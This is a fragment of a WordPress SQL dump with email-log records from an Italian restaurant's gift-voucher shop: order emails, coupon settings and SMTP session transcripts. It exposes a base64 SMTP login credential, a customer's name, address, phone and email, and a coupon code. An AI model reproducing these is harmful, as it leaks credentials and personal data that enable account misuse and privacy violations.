#969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22858,1261,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(22859,1261,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n1>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=\r\n=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- End Header -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=\r\n<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=09=09=09<!-- B=\r\nody -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"=\r\n0\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"=\r\ntop\" id=3D\"body_content\" style=3D\"background-color: #fdfdfd;\">=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\"=\r\n width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding:=\r\n 48px 48px 32px;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div i=\r\nd=3D\"body_content_inner\" style=3D\'color: #737373; font-family: \"Helvetic=\r\na Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-hei=\r\nght: 150%; text-align: left;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">Hi Ma=\r\ntteo,</p>=0A<p style=3D\"margin: 0 0 16px;\">Just to let you know =E2=80=\r\n=94 we\'ve received your order #1257, and it is now being processed:</p>=\r\n=0A=0A=0A<h2 style=3D\'color: #557da1; display: block; font-family: \"Helv=\r\netica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font=\r\n-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>=\r\n=0A=09[Order #1257] (28 November 2020)</h2>=0A=0A<div style=3D\"margin-bo=\r\nttom: 40px;\">=0A=09<table class=3D\"td\" cellspacing=3D\"0\" cellpadding=3D\"=\r\n6\" border=3D\"1\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vert=\r\nical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetic=\r\na, Roboto, Arial, sans-serif;\">=0A=09=09<thead>=0A=09=09=09<tr>=0A=09=09=\r\n=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1p=\r\nx solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left=\r\n;\">Product</th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"co=\r\nlor: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding=\r\n: 12px; text-align: left;\">Quantity</th>=0A=09=09=09=09<th class=3D\"td\"=\r\n scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4; verti=\r\ncal-align: middle; padding: 12px; text-align: left;\">Price</th>=0A=09=09=\r\n=09</tr>=0A=09=09</thead>=0A=09=09<tbody>=0A=09=09=09=09<tr class=3D\"ord=\r\ner_item\">=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px=\r\n solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle;=\r\n font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; wo=\r\nrd-wrap: break-word;\">=0A=09=09Buono Regalo (valore a scelta)<ul class=\r\n=3D\"wc-item-meta\" style=3D\"font-size: small; margin: 1em 0 0; padding: 0=\r\n; list-style: none;\">=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A=\r\n<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right:=\r\n .25em; clear: both;\">To:</strong> <p style=3D\"margin: 0;\">Matteo Arlott=\r\ni</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong=\r\n class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right: .25em;=\r\n clear: both;\">From:</strong> <p style=3D\"margin: 0;\">Matteo Arlotti</p>=\r\n=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=\r\n=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right: .25em; clear=\r\n: both;\">Message:</strong> <p style=3D\"margin: 0;\">Cena delivery 28-11<b=\r\nr>=0AViale Ugo Foscolo 27 - Rimini  47921<br>=0A371 3930671</p>=0A</li>=\r\n=0A</ul>=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; bo=\r\nrder: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align=\r\n: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-=\r\nserif;\">=0A=09=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color=\r\n: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; v=\r\nertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto,=\r\n Arial, sans-serif;\">=0A=09=09=09<span class=3D\"woocommerce-Price-amount=\r\n amount\">58,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC=\r\n</span></span>=09=09</td>=0A=09</tr>=0A=09=09=09<tr>=0A=09=09=09<td cols=\r\npan=3D\"3\" style=3D\"padding: 12px; text-align: left; vertical-align: midd=\r\nle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;=\r\n\">=0A=09=09=09=09<p style=3D\"margin: 0 0 16px;\">Validit=C3=A0 6 mesi dal=\r\n momento dell\'acquisto</p>=0A=09=09=09</td>=0A=09=09</tr>=0A=09=09=0A=09=\r\n=09</tbody>=0A=09=09<tfoot>=0A=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #7=\r\n37373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px;=\r\n text-align: left; border-top-width: 4px;\">Subtotal:</th>=0A=09=09=09=09=\r\n=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e=\r\n4; vertical-align: middle; padding: 12px; text-align: left; border-top-w=\r\nidth: 4px;\"><span class=3D\"woocommerce-Price-amount amount\">58,00<span c=\r\nlass=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=\r\n=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #7=\r\n37373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px;=\r\n text-align: left;\">Payment method:</th>=0A=09=09=09=09=09=09<td class=\r\n=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-ali=\r\ngn: middle; padding: 12px; text-align: left;\">PayPal</td>=0A=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th cl=\r\nass=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border:=\r\n 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: l=\r\neft;\">Total:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #=\r\n737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px=\r\n; text-align: left;\"><span class=3D\"woocommerce-Price-amount amount\">58,=\r\n00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></spa=\r\nn></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09</tfoot>=0A=09</ta=\r\nble>=0A</div>=0A=0A=0A<table id=3D\"addresses\" cellspacing=3D\"0\" cellpadd=\r\ning=3D\"0\" border=3D\"0\" style=3D\"width: 100%; vertical-align: top; margin=\r\n-bottom: 40px; padding: 0;\">=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=\r\n=3D\"50%\" style=3D\"text-align: left; font-family: \'Helvetica Neue\', Helve=\r\ntica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">=0A=09=09=09<h2=\r\n style=3D\'color: #557da1; display: block; font-family: \"Helvetica Neue\",=\r\n Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bol=\r\nd; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing addre=\r\nss</h2>=0A=0A=09=09=09<address class=3D\"address\" style=3D\"padding: 12px;=\r\n color: #737373; border: 1px solid #e4e4e4;\">=0A=09=09=09=09inclubitalia=\r\n<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI=\r\n=09=09=09=09=09=09=09=09=09<br><a href=3D\"tel:3713930671\" style=3D\"color=\r\n: #557da1; font-weight: normal; text-decoration: underline;\">371 3930671=\r\n</a>=09=09=09=09=09=09=09=09=09=09=09=09=09<br>arlostaff@gmail.com=09=09=\r\n=09=09=09=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table>=0A<p=\r\n style=3D\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!<=\r\n/p>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Body -->=\r\n=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=\r\n=09=09=09=09</table>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=\r\n=09=09<tr>=0A=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=\r\n=09=09=09=09=09<!-- Footer -->=0A=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\"=\r\n>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"to=\r\np\" style=3D\"padding: 0; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100=\r\n%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=3D\'border-=\r\nradius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", H=\r\nelvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%;=\r\n text-align: center; padding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=\r\n=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=\r\n=09=09=09=09=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09=\r\n</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kj1D1-0008FP-E9\r\n'),(22860,1262,'discount_type','fixed_cart'),(22861,1262,'coupon_amount','58'),(22862,1262,'individual_use','no'),(22863,1262,'usage_limit','1'),(22864,1262,'usage_limit_per_user','0'),(22865,1262,'limit_usage_to_x_items',NULL),(22866,1262,'usage_count','0'),(22867,1262,'date_expires','1622073600'),(22868,1262,'free_shipping','yes'),(22869,1262,'exclude_sale_items','no'),(22870,1262,'apply_before_tax','no'),(22871,1262,'minimum_amount',''),(22872,1262,'maximum_amount',''),(22873,1262,'exclude_product_ids',''),(22874,1262,'exclude_product_categories',''),(22875,1262,'product_ids',''),(22876,1262,'product_categories','a:0:{}'),(22877,1262,'mwb_wgm_giftcard_coupon','1257'),(22878,1262,'mwb_wgm_giftcard_coupon_unique','online'),(22879,1262,'mwb_wgm_giftcard_coupon_product_id','548'),(22880,1262,'mwb_wgm_giftcard_coupon_mail_to','Matteo Arlotti'),(22881,1257,'1257#383','a:1:{i:0;s:18:\"solymarcouponE5MGX\";}'),(22882,1263,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22883,1263,'success',''),(22884,1263,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22885,1263,'to_header','arlostaff@gmail.com'),(22886,1263,'bcc_header','arlostaff@gmail.com'),(22887,1263,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22888,1263,'original_to','arlostaff@gmail.com'),(22889,1263,'original_subject','Sol Y Mar, ristorante a Riccione'),(22890,1263,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Cena delivery 28-11 <br>\r\nViale Ugo Foscolo 27 - Rimini  47921<br>\r\n371 3930671</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Matteo Arlotti</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Matteo Arlotti</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1606573699www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1606573699solymarcouponE5MGX.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 27/05/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(22891,1263,'original_headers','[\"Bcc:arlostaff@gmail.com\"]'),(22892,1263,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 09:28:21 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22893,1264,'solution','Not found, check status column for more info.'),(22894,1264,'success','1'),(22895,1264,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22896,1264,'to_header','arlostaff@gmail.com'),(22897,1264,'bcc_header','arlostaff@gmail.com'),(22898,1264,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22899,1264,'original_to','arlostaff@gmail.com'),(22900,1264,'original_subject','Sol Y Mar, ristorante a Riccione'),(22901,1264,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Cena delivery 28-11 <br>\r\nViale Ugo Foscolo 27 - Rimini  47921<br>\r\n371 3930671</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Matteo Arlotti</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Matteo Arlotti</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1606573699www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1606573699solymarcouponE5MGX.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 27/05/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(22902,1264,'original_headers','[\"Bcc:arlostaff@gmail.com\"]'),(22903,1264,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\nL0xlbmd0aCA1MyAwIFIKL0ZpbHRlciAvRmxhdGVEZWNvZGUKPj4Kc3RyZWFtCnicjTh5XFNX\r\nuuc79ybgVMUASaSoJASCEMIWSWQTCHshAVlVlJ2wSAiyCAEFqUVqcaMW3NqqdBml6FgLfW3n\r\nV1vn1ba2tdWpjHX6+uvib9ppbd/zvb7OOBUu77s3idbp+2MunNxzvvOd73zn288lQAhxJ9sI\r\nQ0huQXhUW8cfHkHILmwVdU12y3eaKjP2vydk0en62sqa2iVZGkIkTyJMX4+Aea+7LcPxVRwH\r\n1Fvbu8684nEbx9jImSZbdeWGi2txzvMEjtdZK7taSARJI8SLxbGiudJa2+5X+yGOAwihFYSh\r\nfbCPiAhLH6NrECPb8YYyEgXROMYp10MHebZdT1F2iZkkEcUdll7n/pu8y+pAU0HIUQGTpR/y\r\nu+EJgVTNXRY1iv6TLEeq6gCVv9hNTKXennKZzMB6qcQ4FKv81Wp19Aq9Xm+QyXBCLsrRcl/9\r\ndOBWvmWjtbH4xuPUP/WtBUpZxGRX64t9KYndp5tLj0QGrZCw4p9+rCht4T54+TXuknVdEQBd\r\nbbKFllUVHv1yz56/HC8GiNSqG/KRJZI/d4X1ZfOIHwlBTlao1UG4aZAYH6m3TCbTReHuKrGb\r\nPw8PMugdzCAvrK+bh3RJ8fiB1qltqcbeybbSwy+pJrIu5w9oFIuBZSNXNyUnNeVqAD6Pr+m